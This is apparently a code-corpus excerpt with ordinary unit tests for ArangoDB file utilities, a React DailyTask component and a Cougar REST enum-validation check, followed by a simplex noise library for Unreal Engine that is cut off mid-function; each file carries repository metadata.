EXPECT_TRUE(true == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(true == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename2.c_str()));
res = TRI_RemoveDirectory(filename1.c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename1.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(false == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename2.c_str()));
}
TEST_F(CFilesTest, tst_removedirectorydeterministic) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter << "-dir";
std::string filename1 = out.str();
out << TRI_DIR_SEPARATOR_CHAR << "abc";
std::string filename2 = out.str();
long unused1;
std::string unused2;
int res = TRI_CreateRecursiveDirectory(filename2.c_str(), unused1, unused2);
EXPECT_TRUE(0 == res);
EXPECT_TRUE(true == TRI_ExistsFile(filename1.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(true == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename2.c_str()));
res = TRI_RemoveDirectoryDeterministic(filename1.c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename1.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(false == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename2.c_str()));
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file exists
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_existsfile) {
StringBuffer* filename = writeFile("");
EXPECT_TRUE(true == TRI_ExistsFile(filename->c_str()));
TRI_UnlinkFile(filename->c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename->c_str()));
delete filename;
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file size empty file
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_filesize_empty) {
StringBuffer* filename = writeFile("");
EXPECT_TRUE(0U == TRI_SizeFile(filename->c_str()));
TRI_UnlinkFile(filename->c_str());
delete filename;
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file size
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_filesize_exists) {
const char* buffer = "the quick brown fox";
StringBuffer* filename = writeFile(buffer);
EXPECT_TRUE(static_cast<int>(strlen(buffer)) == TRI_SizeFile(filename->c_str()));
TRI_UnlinkFile(filename->c_str());
delete filename;
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file size, non existing file
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_filesize_non) {
EXPECT_TRUE(-1 == (int) TRI_SizeFile("h5uuuuui3unn645wejhdjhikjdsf"));
EXPECT_TRUE(-1 == (int) TRI_SizeFile("dihnui8ngiu54"));
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test absolute path
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_absolute_paths) {
std::string path;
#ifdef _WIN32
path = TRI_GetAbsolutePath("the-fox", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\the-fox") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\the-fox.lol") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "\\tmp\\the-fox");
EXPECT_TRUE(std::string("\\tmp\\the-fox\\the-fox.lol") == path);
path = TRI_GetAbsolutePath("file", "\\");
EXPECT_TRUE(std::string("\\file") == path);
path = TRI_GetAbsolutePath(".\\file", "\\");
EXPECT_TRUE(std::string("\\.\\file") == path);
path = TRI_GetAbsolutePath("\\file", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\file") == path);
path = TRI_GetAbsolutePath("\\file\\to\\file", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\file\\to\\file") == path);
path = TRI_GetAbsolutePath("file\\to\\file", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\file\\to\\file") == path);
path = TRI_GetAbsolutePath("c:\\file\\to\\file", "abc");
EXPECT_TRUE(std::string("c:\\file\\to\\file") == path);
path = TRI_GetAbsolutePath("c:\\file\\to\\file", "\\tmp");
EXPECT_TRUE(std::string("c:\\file\\to\\file") == path);
#else
path = TRI_GetAbsolutePath("the-fox", "/tmp");
EXPECT_TRUE(std::string("/tmp/the-fox") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "/tmp");
EXPECT_TRUE(std::string("/tmp/the-fox.lol") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "/tmp/the-fox");
EXPECT_TRUE(std::string("/tmp/the-fox/the-fox.lol") == path);
path = TRI_GetAbsolutePath("file", "/");
EXPECT_TRUE(std::string("/file") == path);
path = TRI_GetAbsolutePath("./file", "/");
EXPECT_TRUE(std::string("/./file") == path);
path = TRI_GetAbsolutePath("/file", "/tmp");
EXPECT_TRUE(std::string("/file") == path);
path = TRI_GetAbsolutePath("/file/to/file", "/tmp");
EXPECT_TRUE(std::string("/file/to/file") == path);
path = TRI_GetAbsolutePath("file/to/file", "/tmp");
EXPECT_TRUE(std::string("/tmp/file/to/file") == path);
path = TRI_GetAbsolutePath("c:file/to/file", "/tmp");
EXPECT_TRUE(std::string("c:file/to/file") == path);
#endif
}
TEST_F(CFilesTest, tst_normalize) {
  // FileUtils::normalizePath rewrites a path in place. The expectations
  // below document the observed behavior: on Windows '/' separators are
  // rewritten to '\', on other platforms the input is left unchanged.
  // EXPECT_EQ is used instead of EXPECT_TRUE(a == b) so that a failing
  // case prints both the expected and the actual path.
  std::string path;

  path = "/foo/bar/baz";
  FileUtils::normalizePath(path);
#ifdef _WIN32
  EXPECT_EQ("\\foo\\bar\\baz", path);
#else
  EXPECT_EQ("/foo/bar/baz", path);
#endif

  path = "\\foo\\bar\\baz";
  FileUtils::normalizePath(path);
  // same expectation on both platforms: backslashes are already native on
  // Windows and are not rewritten on POSIX
  EXPECT_EQ("\\foo\\bar\\baz", path);

  path = "/foo/bar\\baz";
  FileUtils::normalizePath(path);
#ifdef _WIN32
  EXPECT_EQ("\\foo\\bar\\baz", path);
#else
  EXPECT_EQ("/foo/bar\\baz", path);
#endif

  path = "/foo/bar/\\baz";
  FileUtils::normalizePath(path);
#ifdef _WIN32
  EXPECT_EQ("\\foo\\bar\\baz", path);
#else
  EXPECT_EQ("/foo/bar/\\baz", path);
#endif

  path = "//foo\\/bar/\\baz";
  FileUtils::normalizePath(path);
#ifdef _WIN32
  EXPECT_EQ("\\\\foo\\bar\\baz", path);
#else
  EXPECT_EQ("//foo\\/bar/\\baz", path);
#endif

  path = "\\\\foo\\/bar/\\baz";
  FileUtils::normalizePath(path);
#ifdef _WIN32
  EXPECT_EQ("\\\\foo\\bar\\baz", path);
#else
  EXPECT_EQ("\\\\foo\\/bar/\\baz", path);
#endif
}
TEST_F(CFilesTest, tst_getfilename) {
  // TRI_GetFilename returns the component after the last path separator;
  // both '/' and '\' act as separators in these cases. EXPECT_EQ replaces
  // EXPECT_TRUE(a == b) so a failure shows both values.
  EXPECT_EQ("", TRI_GetFilename(""));
  EXPECT_EQ(".", TRI_GetFilename("."));
  EXPECT_EQ("", TRI_GetFilename("/"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("haxxmann"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("/haxxmann"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("/tmp/haxxmann"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("/a/b/c/haxxmann"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("c:/haxxmann"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("c:/tmp/haxxmann"));
  EXPECT_EQ("foo", TRI_GetFilename("c:/tmp/haxxmann/foo"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("\\haxxmann"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("\\a\\haxxmann"));
  EXPECT_EQ("haxxmann", TRI_GetFilename("\\a\\b\\haxxmann"));
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test TRI_Dirname
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_dirname) {
  // Exercises TRI_Dirname with (expected, input) pairs; a small checker
  // lambda removes the per-case boilerplate. Expected values are wrapped
  // in std::string so the comparison is by content, never by pointer.
  auto expectDirname = [](char const* expected, char const* input) {
    EXPECT_EQ(std::string(expected), TRI_Dirname(input));
  };
#ifdef _WIN32
  expectDirname("C:\\Users\\abc def\\foobar", "C:\\Users\\abc def\\foobar\\");
  expectDirname("C:\\Users\\abc def\\foobar", "C:\\Users\\abc def\\foobar\\baz");
  expectDirname("C:\\Users\\abc def\\foobar", "C:\\Users\\abc def\\foobar\\baz.text");
  expectDirname("C:\\Users\\abc def\\foobar", "C:\\Users\\abc def\\foobar\\VERSION-1.tmp");
  expectDirname("\\Users\\abc def\\foobar", "\\Users\\abc def\\foobar\\VERSION-1.tmp");
#else
  expectDirname("/tmp/abc/def hihi", "/tmp/abc/def hihi/");
  expectDirname("/tmp/abc/def hihi", "/tmp/abc/def hihi/abc");
  expectDirname("/tmp/abc/def hihi", "/tmp/abc/def hihi/abc.txt");
  expectDirname("/tmp", "/tmp/");
  expectDirname("/tmp", "/tmp/1");
  expectDirname("/", "/tmp");
  expectDirname("/", "/");
  expectDirname(".", "./");
  expectDirname(".", "");
  expectDirname(".", ".");
  expectDirname("..", "..");
#endif
}
////////////////////////////////////////////////////////////////////////////////
/// @brief process data in a file via a functor
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_processFile) {
  // Pipe a small temporary file through TRI_ProcessFile twice, with two
  // different functors: a byte counter and a SHA-256 accumulator.
  const char* buffer = "the quick brown fox";
  bool good;
  // writeFile() returns a heap-allocated buffer holding the temp file's
  // name; released with delete at the end of the test.
  StringBuffer* filename = writeFile(buffer);
  // the byte-count functor must observe exactly the file's length
  ByteCountFunctor bcf;
  auto reader = std::ref(bcf);
  good = TRI_ProcessFile(filename->c_str(), reader);
  EXPECT_TRUE(good);
  EXPECT_EQ(strlen(buffer), bcf._byteCount);
  // expected value is the hex-encoded SHA-256 of "the quick brown fox"
  TRI_SHA256Functor sha;
  auto shaReader = std::ref(sha);
  good = TRI_ProcessFile(filename->c_str(), shaReader);
  EXPECT_TRUE(good);
  EXPECT_TRUE(sha.final().compare("9ecb36561341d18eb65484e833efea61edc74b84cf5e6ae1b81c63533e25fc8f")==0);
  // remove the temp file, then free the name buffer
  TRI_UnlinkFile(filename->c_str());
  delete filename;
}
|
C++
|
Apache-2.0
|
William533036/arangodb/tests/Basics/files-test.cpp
|
4f302c4d-305b-4ec0-9db3-4c47b03cec95
|
[]
|
[]
|
import React from 'react';
import sinon from 'sinon';
import { render, fireEvent, screen } from '../../../testing/test-utils';
import DailyTask from '../index';
describe('<Daily Task/ >', () => {
  // Spies shared by both test cases. They are never reset between tests,
  // which is safe here only because each test clicks (and asserts on) a
  // disjoint set of spies.
  const updateTaskHandlerSpy = sinon.spy();
  const deleteTaskHandlerSpy = sinon.spy();
  const checkTaskHandlerSpy = sinon.spy();
  // Fixture task rendered by every test case.
  const task = {
    identifier: '07f8536d-c78f-4af3-b668-3c83d122e6e9',
    ticked: true,
    taskName: 'Drink Water',
    date: '2021-04-05',
    taskDescription: 'You should drink 3L of water'
  };
  it('Show daily task with delete and update btn', () => {
    // With enableUpdate/enableDelete the component renders the update
    // button and the delete control, but not the "check task" control.
    const { container } = render(<DailyTask
      task={task}
      enableUpdate
      enableDelete
      updateTaskHandler={updateTaskHandlerSpy}
      deleteTaskHandler={deleteTaskHandlerSpy}
    />);
    expect(container).toMatchSnapshot();
    expect(screen.queryByTestId('formControlLabelDeleteTask')).not.toBeNull();
    expect(screen.queryByTestId('formControlLabelCheckTask')).toBeNull();
    expect(screen.queryByText('Update')).not.toBeNull();
    // task fields must be rendered into the expected test-id slots
    expect(screen.queryByTestId('identifier')).toHaveAttribute('id', task.identifier);
    expect(screen.queryByTestId('name')).toHaveTextContent(task.taskName);
    expect(screen.queryByTestId('description')).toHaveTextContent(task.taskDescription);
    // each click must invoke its handler exactly once
    fireEvent.click(screen.getByTestId('deleteTask'));
    fireEvent.click(screen.getByTestId('updateTask'));
    expect(deleteTaskHandlerSpy).toHaveBeenCalledOnce();
    expect(updateTaskHandlerSpy).toHaveBeenCalledOnce();
  });
  it('Show daily task with checked btn', () => {
    // With enableCheck/enableDate the component renders the check control
    // and the date, but neither the delete control nor the update button.
    const { container } = render(<DailyTask
      task={task}
      enableCheck
      enableDate
      checkTaskHandler={checkTaskHandlerSpy}
    />);
    expect(container).toMatchSnapshot();
    expect(screen.queryByTestId('formControlLabelCheckTask')).not.toBeNull();
    expect(screen.queryByTestId('formControlLabelDeleteTask')).toBeNull();
    expect(screen.queryByText('Update')).toBeNull();
    expect(screen.queryByTestId('identifier')).toHaveAttribute('id', task.identifier);
    expect(screen.queryByText(task.taskName)).not.toBeNull();
    expect(screen.queryByTestId('description')).toHaveTextContent(task.taskDescription);
    expect(screen.queryByTestId('date')).toHaveTextContent(task.date);
    // checking the task must invoke the check handler exactly once
    fireEvent.click(screen.getByTestId('checkedTask'));
    expect(checkTaskHandlerSpy).toHaveBeenCalledOnce();
  });
});
|
JavaScript
|
MIT
|
FlameNutrition/flame-coach-web/src/components/DailyTask/__tests__/index.test.js
|
feb02f53-7b06-4774-a885-94f5ec1707e3
|
[]
|
[]
|
/*
* Copyright 2013, The Sporting Exchange Limited
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Originally from UpdatedComponentTests/StandardValidation/REST/Rest_IDL_QueryParam_ENUM_blank.xls;
package com.betfair.cougar.tests.updatedcomponenttests.standardvalidation.rest;
import com.betfair.testing.utils.cougar.misc.XMLHelpers;
import com.betfair.testing.utils.cougar.assertions.AssertionUtils;
import com.betfair.testing.utils.cougar.beans.HttpCallBean;
import com.betfair.testing.utils.cougar.beans.HttpResponseBean;
import com.betfair.testing.utils.cougar.enums.CougarMessageProtocolRequestTypeEnum;
import com.betfair.testing.utils.cougar.manager.AccessLogRequirement;
import com.betfair.testing.utils.cougar.manager.CougarManager;
import org.testng.annotations.Test;
import org.w3c.dom.Document;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;
import java.sql.Timestamp;
import java.util.HashMap;
import java.util.Map;
/**
* Ensure that Cougar returns the correct fault, when a REST request passes a blank ENUM Query parameter
*/
public class RestIDLQueryParamENUMblankTest {
    @Test
    public void doTest() throws Exception {
        // Create the baseline HttpCallBean and point it at the service
        CougarManager cougarManager1 = CougarManager.getInstance();
        HttpCallBean httpCallBeanBaseline = cougarManager1.getNewHttpCallBean();
        httpCallBeanBaseline.setServiceName("baseline", "cougarBaseline");
        httpCallBeanBaseline.setVersion("v2");
        // Set up the Http Call Bean to make the request
        CougarManager cougarManager2 = CougarManager.getInstance();
        HttpCallBean getNewHttpCallBean2 = cougarManager2.getNewHttpCallBean("87.248.113.14");
        cougarManager2.setCougarFaultControllerJMXMBeanAttrbiute("DetailedFaults", "false");
        getNewHttpCallBean2.setOperationName("enumOperation");
        getNewHttpCallBean2.setServiceName("baseline", "cougarBaseline");
        getNewHttpCallBean2.setVersion("v2");
        // Set the parameters, setting the ENUM Query parameter as blank
        Map<String, String> headerParams = new HashMap<>();
        headerParams.put("headerParam", "FooHeader");
        getNewHttpCallBean2.setHeaderParams(headerParams);
        Map<String, String> queryParams = new HashMap<>();
        queryParams.put("queryParam", "");
        getNewHttpCallBean2.setQueryParams(queryParams);
        getNewHttpCallBean2.setRestPostQueryObjects(DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(new ByteArrayInputStream("<message><bodyParameter>FooBody</bodyParameter></message>".getBytes())));
        // Get current time for getting log entries later
        Timestamp getTimeAsTimeStamp11 = new Timestamp(System.currentTimeMillis());
        // Make the 4 REST calls to the operation
        cougarManager2.makeRestCougarHTTPCalls(getNewHttpCallBean2);
        // Create the expected response as an XML document (Fault DSC-0044)
        XMLHelpers xMLHelpers6 = new XMLHelpers();
        Document createAsDocumentXml = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
        Document createAsDocumentJson = xMLHelpers6.getXMLObjectFromString("<fault><faultcode>Client</faultcode><faultstring>DSC-0044</faultstring><detail/></fault>");
        // Convert the expected response to REST types for comparison with actual responses
        Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesXml = cougarManager2.convertResponseToRestTypes(createAsDocumentXml, getNewHttpCallBean2);
        Map<CougarMessageProtocolRequestTypeEnum, Object> convertResponseToRestTypesJson = cougarManager2.convertResponseToRestTypes(createAsDocumentJson, getNewHttpCallBean2);
        // Check the 4 protocol combinations all report 400 Bad Request
        HttpResponseBean response7 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLXML);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response7.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response7.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response7.getHttpStatusText());
        HttpResponseBean response8 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONJSON);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response8.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response8.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response8.getHttpStatusText());
        HttpResponseBean response9 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTXMLJSON);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesXml.get(CougarMessageProtocolRequestTypeEnum.RESTJSON), response9.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response9.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response9.getHttpStatusText());
        HttpResponseBean response10 = getNewHttpCallBean2.getResponseObjectsByEnum(com.betfair.testing.utils.cougar.enums.CougarMessageProtocolResponseTypeEnum.RESTJSONXML);
        AssertionUtils.multiAssertEquals(convertResponseToRestTypesJson.get(CougarMessageProtocolRequestTypeEnum.RESTXML), response10.getResponseObject());
        AssertionUtils.multiAssertEquals((int) 400, response10.getHttpStatusCode());
        AssertionUtils.multiAssertEquals("Bad Request", response10.getHttpStatusText());
        // generalHelpers.pauseTest(500L);
        // Check the access log recorded a BadRequest entry for each call
        CougarManager cougarManager13 = CougarManager.getInstance();
        cougarManager13.verifyAccessLogEntriesAfterDate(getTimeAsTimeStamp11, new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest"),new AccessLogRequirement("87.248.113.14", "/cougarBaseline/v2/enumOperation", "BadRequest") );
    }
}
|
Java
|
Apache-2.0
|
JLLeitschuh/cougar/cougar-test/cougar-normal-code-tests/src/test/java/com/betfair/cougar/tests/updatedcomponenttests/standardvalidation/rest/RestIDLQueryParamENUMblankTest.java
|
6971893a-1d8f-4dc4-b06f-88b01064f928
|
[{"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 2415, "end": 2428, "context": "ttpCallBean2 = cougarManager2.getNewHttpCallBean(\"87.248.113.14\");\n cougarManager2 = cougarManager2;\n\n "}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6881, "end": 6894, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6789, "end": 6802, "context": "e(getTimeAsTimeStamp11, new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 7065, "end": 7078, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}]
|
[{"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 2415, "end": 2428, "context": "ttpCallBean2 = cougarManager2.getNewHttpCallBean(\"87.248.113.14\");\n cougarManager2 = cougarManager2;\n\n "}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6881, "end": 6894, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 6789, "end": 6802, "context": "e(getTimeAsTimeStamp11, new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}, {"tag": "IP_ADDRESS", "value": "87.248.113.14", "start": 7065, "end": 7078, "context": "eration\", \"BadRequest\"),new AccessLogRequirement(\"87.248.113.14\", \"/cougarBaseline/v2/enumOperation\", \"BadRequest"}]
|
/*
SimplexNoise 1.0.0
-----
DevDad - Afan Olovcic @ www.art-and-code.com - 08/12/2015
This algorithm was originally designed by Ken Perlin, but my code has been
adapted and extended from the implementation written by Stefan Gustavson (stegu@itn.liu.se)
and modified to fit to Unreal Engine 4
* This is a clean, fast, modern and free Perlin Simplex noise function.
* If we change float to double it could be even faster but there is no double type in Blueprint
* All Public Functions are BlueprintCallable so they can be used in every blueprint
From DevDad and Dedicated to you and Unreal Community
Use it free for what ever you want
I only request that you mention me in the credits for your game in the way that feels most appropriate to you.
*/
#include "SimplexNoiseBPLibrary.h"
#include "SimplexNoisePrivatePCH.h"
// USimplexNoiseBPLibrary
#define FASTFLOOR(x) ( ((x)>0) ? ((int)x) : (((int)x)-1) )
// Default UObject constructor; no per-instance state to set up — the noise
// tables below are static members.
USimplexNoiseBPLibrary::USimplexNoiseBPLibrary(const class FObjectInitializer& PCIP)
	: Super(PCIP)
{
}
// Ken Perlin's reference permutation table, with the 256 entries duplicated
// into the upper half so nested lookups such as perm[ii + perm[jj]] never
// need an explicit wrap (indices stay < 512). setNoiseSeed() overwrites the
// table with seeded random bytes using the same duplication scheme.
unsigned char USimplexNoiseBPLibrary::perm[512] = { 151,160,137,91,90,15,
131,13,201,95,96,53,194,233,7,225,140,36,103,30,69,142,8,99,37,240,21,10,23,
190, 6,148,247,120,234,75,0,26,197,62,94,252,219,203,117,35,11,32,57,177,33,
88,237,149,56,87,174,20,125,136,171,168, 68,175,74,165,71,134,139,48,27,166,
77,146,158,231,83,111,229,122,60,211,133,230,220,105,92,41,55,46,245,40,244,
102,143,54, 65,25,63,161, 1,216,80,73,209,76,132,187,208, 89,18,169,200,196,
135,130,116,188,159,86,164,100,109,198,173,186, 3,64,52,217,226,250,124,123,
5,202,38,147,118,126,255,82,85,212,207,206,59,227,47,16,58,17,182,189,28,42,
223,183,170,213,119,248,152, 2,44,154,163, 70,221,153,101,155,167, 43,172,9,
129,22,39,253, 19,98,108,110,79,113,224,232,178,185, 112,104,218,246,97,228,
251,34,242,193,238,210,144,12,191,179,162,241, 81,51,145,235,249,14,239,107,
49,192,214, 31,181,199,106,157,184, 84,204,176,115,121,50,45,127, 4,150,254,
138,236,205,93,222,114,67,29,24,72,243,141,128,195,78,66,215,61,156,180,
151,160,137,91,90,15,
131,13,201,95,96,53,194,233,7,225,140,36,103,30,69,142,8,99,37,240,21,10,23,
190, 6,148,247,120,234,75,0,26,197,62,94,252,219,203,117,35,11,32,57,177,33,
88,237,149,56,87,174,20,125,136,171,168, 68,175,74,165,71,134,139,48,27,166,
77,146,158,231,83,111,229,122,60,211,133,230,220,105,92,41,55,46,245,40,244,
102,143,54, 65,25,63,161, 1,216,80,73,209,76,132,187,208, 89,18,169,200,196,
135,130,116,188,159,86,164,100,109,198,173,186, 3,64,52,217,226,250,124,123,
5,202,38,147,118,126,255,82,85,212,207,206,59,227,47,16,58,17,182,189,28,42,
223,183,170,213,119,248,152, 2,44,154,163, 70,221,153,101,155,167, 43,172,9,
129,22,39,253, 19,98,108,110,79,113,224,232,178,185, 112,104,218,246,97,228,
251,34,242,193,238,210,144,12,191,179,162,241, 81,51,145,235,249,14,239,107,
49,192,214, 31,181,199,106,157,184, 84,204,176,115,121,50,45,127, 4,150,254,
138,236,205,93,222,114,67,29,24,72,243,141,128,195,78,66,215,61,156,180
};
void USimplexNoiseBPLibrary::setNoiseSeed(const int32& newSeed)
{
FMath::RandInit(newSeed);
for (uint16 it = 0; it < 256; ++it)
{
uint8 nextNum = FMath::RandRange(0, 255);
USimplexNoiseBPLibrary::perm[it] = (unsigned char)nextNum;
USimplexNoiseBPLibrary::perm[it + 256] = (unsigned char)nextNum;
}
}
// Lookup table used by the 4D noise to pick a traversal order for the
// simplex corners. It is indexed by a 6-bit code built from the pairwise
// comparisons of (x0, y0, z0, w0); each valid row ranks the four
// coordinates 0..3. Rows of {0,0,0,0} correspond to comparison outcomes
// that cannot occur.
static unsigned char simplex[64][4] = {
	{ 0,1,2,3 },{ 0,1,3,2 },{ 0,0,0,0 },{ 0,2,3,1 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 1,2,3,0 },
	{ 0,2,1,3 },{ 0,0,0,0 },{ 0,3,1,2 },{ 0,3,2,1 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 1,3,2,0 },
	{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },
	{ 1,2,0,3 },{ 0,0,0,0 },{ 1,3,0,2 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 2,3,0,1 },{ 2,3,1,0 },
	{ 1,0,2,3 },{ 1,0,3,2 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 2,0,3,1 },{ 0,0,0,0 },{ 2,1,3,0 },
	{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },
	{ 2,0,1,3 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 3,0,1,2 },{ 3,0,2,1 },{ 0,0,0,0 },{ 3,1,2,0 },
	{ 2,1,0,3 },{ 0,0,0,0 },{ 0,0,0,0 },{ 0,0,0,0 },{ 3,1,0,2 },{ 0,0,0,0 },{ 3,2,0,1 },{ 3,2,1,0 } };
// 1D gradient: pick one of 8 magnitudes (1.0 .. 8.0) from the low three
// hash bits, a sign from bit 3, and scale the distance x by the result.
double USimplexNoiseBPLibrary::_grad(int hash, double x)
{
	const int h = hash & 15;
	const double magnitude = 1.0 + (h & 7);
	return ((h & 8) ? -magnitude : magnitude) * x;
}
// 2D gradient: selects one of 8 gradient directions from the low 3 hash
// bits and returns its dot product with the distance vector (x, y).
double USimplexNoiseBPLibrary::_grad(int hash, double x, double y)
{
	int h = hash & 7;      // Convert low 3 bits of hash code
	double u = h < 4 ? x : y;  // into 8 simple gradient directions,
	double v = h < 4 ? y : x;  // and compute the dot product with (x,y).
	return ((h & 1) ? -u : u) + ((h & 2) ? -2.0f*v : 2.0f*v);
}
// 3D gradient: selects one of 12 gradient directions from the low 4 hash
// bits and returns its dot product with the distance vector (x, y, z).
double USimplexNoiseBPLibrary::_grad(int hash, double x, double y, double z)
{
	int h = hash & 15; // Convert low 4 bits of hash code into 12 simple
	double u = h < 8 ? x : y; // gradient directions, and compute dot product.
	double v = h < 4 ? y : h == 12 || h == 14 ? x : z; // Fix repeats at h = 12 to 15
	return ((h & 1) ? -u : u) + ((h & 2) ? -v : v);
}
// 4D gradient: selects one of 32 gradient directions from the low 5 hash
// bits and returns its dot product with the distance vector (x, y, z, t).
double USimplexNoiseBPLibrary::_grad(int hash, double x, double y, double z, double t)
{
	int h = hash & 31; // Convert low 5 bits of hash code into 32 simple
	double u = h < 24 ? x : y; // gradient directions, and compute dot product.
	double v = h < 16 ? y : z;
	double w = h < 8 ? z : t;
	return ((h & 1) ? -u : u) + ((h & 2) ? -v : v) + ((h & 4) ? -w : w);
}
// Core 1D simplex noise: sums the falloff-weighted gradient contributions
// of the two lattice points bracketing x.
double USimplexNoiseBPLibrary::_simplexNoise1D(double x)
{
	int i0 = FASTFLOOR(x);
	int i1 = i0 + 1;
	double x0 = x - i0;   // distance from left lattice point, in [0, 1)
	double x1 = x0 - 1.0; // distance from right lattice point, in [-1, 0)
	double n0, n1;

	double t0 = 1.0 - x0 * x0;
	// no clamp needed: |x0| < 1 keeps t0 > 0
	// if(t0 < 0.0f) t0 = 0.0f;
	t0 *= t0;
	n0 = t0 * t0 * _grad(perm[i0 & 0xff], x0);

	double t1 = 1.0 - x1 * x1;
	// likewise |x1| <= 1 keeps t1 >= 0
	// if(t1 < 0.0f) t1 = 0.0f;
	t1 *= t1;
